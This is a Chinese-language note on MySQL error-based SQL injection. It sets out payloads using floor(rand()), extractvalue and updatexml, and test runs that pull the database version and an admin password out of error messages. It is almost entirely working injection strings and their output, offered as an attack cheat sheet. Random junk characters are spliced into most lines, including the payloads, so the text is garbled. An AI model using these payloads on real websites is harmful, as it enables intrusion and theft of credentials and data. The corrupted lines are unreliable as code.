放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。; _1 w0 S9 K) S
实际测试环境:
5 T# S, V2 n) K. ?5 q9 {1 l) x/ s# U+ q7 c
, {3 |* t9 I0 s Emysql> show tables;
! s: y7 A$ \4 ?( |: C# g2 ]+----------------+2 ]$ L! m2 {$ s- Q. m1 s. C3 g5 \' h0 M
| Tables_in_test |$ \2 x3 ^8 ]2 Y9 i4 A
+----------------+8 U" `& r3 B+ C
| admin |
% O+ d! W1 e- S! T( l; H2 Y3 b| article |
5 ^% k! T$ A9 H) u: k/ _) {5 L+----------------+; w9 d2 ^1 ]3 b. d* h
9 a- U; h- N) }% ~# Y3 d0 t
3 W+ s2 F: |/ y9 L+ T$ C& R/ \ $ x8 u9 d/ J$ r- S# m& }& m
mysql> describe admin;
$ S' h6 H/ s, T7 t- l z1 N4 I) K+-------+------------------+------+-----+---------+----------------+
# R' ^. @: i5 o( v. z/ ~# c6 ?| Field | Type | Null | Key | Default | Extra |, P S* L% m* ^! S: \3 p
+-------+------------------+------+-----+---------+----------------+
& V, M' V1 F' {0 l5 J6 Z1 D| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
$ J4 `: a+ W9 x# j3 x" u6 O5 Q| user | varchar(50) | NO | | NULL | |
* O8 {7 W5 n& g- y9 M' [| pass | varchar(50) | NO | | NULL | |- X; i% `7 }" y* z! b: p
+-------+------------------+------+-----+---------+----------------+" |8 ^6 q$ |) k8 K" H+ w
2 h1 B5 M3 X5 q- V+ K
Y8 P5 J6 D6 }; {; k' i ' U- Z; ^7 C; n) \; \
mysql> describe article;
2 ~3 W. D. C9 y- E4 T5 T2 @+---------+------------------+------+-----+---------+----------------+ g% N3 T% e1 O. V6 Z& b- Z: ?
| Field | Type | Null | Key | Default | Extra |
: a+ r( X0 }5 o* M, C+---------+------------------+------+-----+---------+----------------+- k5 i8 r( w* O! x$ ?7 `
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
/ F( U% U7 f) s; ~| title | varchar(50) | NO | | NULL | |2 Y/ ]0 M2 z8 g/ i* v
| content | varchar(50) | NO | | NULL | |
3 ^: h' V' S- D3 o+---------+------------------+------+-----+---------+----------------+7 w/ G$ |1 J! z& |
1、通过floor报错# ?* q1 `* G+ n7 e
可以通过如下一些利用代码
3 c c0 d7 r& c5 n! h( X . m& a' u2 j& R A$ t$ ^
: k7 x6 f3 j) a, i
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x! Z, L @' x3 ?- q$ q
from information_schema.tables group by x)a);4 k+ C; x- u0 ^7 n
2 x: [# y- l) S/ J# c" n5 R
& S9 E+ e) I- V% V& [ y4 u Xand (select count(*) from (select 1 union select null union select !1)x% x1 M G* q8 [/ d
group by concat((select table_name from information_schema.tables limit 1),
% f. H+ ]5 t1 Ufloor(rand(0)*2)));
9 S# O0 y( R; j5 L3 ~举例如下:: n. b! A1 I5 k$ z4 u
首先进行正常查询:
$ {0 {: S9 I% s1 [ , `, a: R; y D
mysql> select * from article where id = 1;+ K& u# F$ r0 s+ ]
+----+-------+---------+
6 ~) q1 d; y) \ E. ^2 z| id | title | content |( \9 S+ c7 A4 {( z6 ^+ w( ~
+----+-------+---------+3 Z" w8 Y6 P/ _8 _8 Y( k9 @& F
| 1 | test | do it |1 r4 {* d- x0 R5 D
+----+-------+---------+
) ^4 X U/ j8 v3 i: r- Q0 s0 n( c假如id输入存在注入的话,可以通过如下语句进行报错。
# F& y _0 X: u# j2 J( _0 {* ~2 M6 B
2 ~! i* }9 s/ Y " o& N/ ~0 O9 w, Z9 a. B2 M
mysql> select * from article where id = 1 and (select 1 from5 f/ R+ P3 V2 {1 @4 `
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);0 i% r& s5 ?3 V% n( \
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
( T5 ~4 r0 r9 w可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 _. U5 D- D# f$ n9 F) z9 i例如我们需要查询管理员用户名和密码:) G- M' W8 `- W5 _" U! J
Method1:
0 P# B' }% u7 p5 L) H % P$ d6 i' K. D" W! P( `1 G
" @* ]2 z3 c4 h. m. U
mysql> select * from article where id = 1 and (select 1 from9 Y5 X/ I2 A+ S1 q9 g% }7 [4 O
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
0 D8 }" w) y i! Y( ^3 M) @* _from information_schema.tables group by x)a);9 q1 q' c$ b6 v+ [: O
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'7 N% F9 t3 _& D7 I" p9 c
Method2:8 f5 ]5 P/ {) ? |1 F M6 L2 X4 X* R6 q
* K) @" n: {) C- O3 H/ s% o
: ?" X1 A5 R' bmysql> select * from article where id = 1 and (select count(*)
; W" _. b" S- p+ f1 v$ S& ~9 I' yfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
9 H* j- b0 r# n( O( f j/ Wfloor(rand(0)*2)));& f5 m: K! {0 W8 Y, @; _% O
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
* l; R' i$ A+ O4 ?5 y/ k+ ~! ?2 D. f X2、ExtractValue" Q2 g1 _* @0 J, A6 [3 b: R
测试语句如下
5 t' C1 N0 r- h! ?! `9 d9 e 0 Y- V( a8 h+ d6 @8 b# A
# k* B$ V3 O2 d2 Kand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));0 X T! F) q, \3 j& Q
实际测试过程' @& C" h4 R$ k2 }7 [( _
& K% B! a4 W+ E: f0 {' L" w* R 5 L9 x8 W1 j0 m3 p
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,4 j# w- ?" J1 q- \
(select pass from admin limit 1)));--5 {. G& P3 @& G, x
ERROR 1105 (HY000): XPATH syntax error: '\admin888'9 N2 ?8 y( Y# H
3、UpdateXml
8 O7 P* s$ J- q2 V7 Q( A测试语句& b7 S: {0 |7 I3 l
& e+ W/ h' N2 A) v. B, I
, ` a( ?5 M0 R" Hand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
# n/ {2 }: f' F, o* [, \实际测试过程: O7 z3 |$ R: l
% U" \$ L' u; J; U6 `+ w 2 _: O# w/ d5 ?1 Y) a+ N2 w1 X
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
' s6 O* H% u5 \) b" O1 r0 p(select pass from admin limit 1),0x5e24),1));
( i3 r2 E& v c) i( b& MERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'9 v, k A+ b5 ?+ d' j
All, thanks foreign guys.4 \5 K8 M1 Q1 o
5 Q3 t" k8 E0 @ W! G: S' E
5 J H) B6 K/ Z) K* S. h |